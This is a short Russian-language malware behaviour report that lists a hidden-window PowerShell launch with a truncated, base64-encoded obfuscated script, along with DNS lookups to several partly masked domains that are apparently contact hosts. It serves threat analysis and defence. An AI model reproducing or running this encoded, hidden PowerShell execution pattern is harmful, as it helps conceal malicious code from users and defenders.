Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABjADEAMgBjAGMAYgA1ADIAeAA5ADgAYgA9ACcAeAAwADAAYwA4AGMAYgB4ADUAMwA0ADAAJwA7ACQAeABiADYAMAAyADUAMAA...
- DNS ASK no#####roperties.com
- DNS ASK as###metals.com
- DNS ASK sk##mu.com
- DNS ASK la####usgreen.com
- DNS ASK vi#####shairline.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABjADEAMgBjAGMAYgA1ADIAeAA5ADgAYgA9ACcAeAAwADAAYwA4AGMAYgB4ADUAMwA0ADAAJwA7ACQAeABiADYAMAAyADUAMAA...' (со скрытым окном)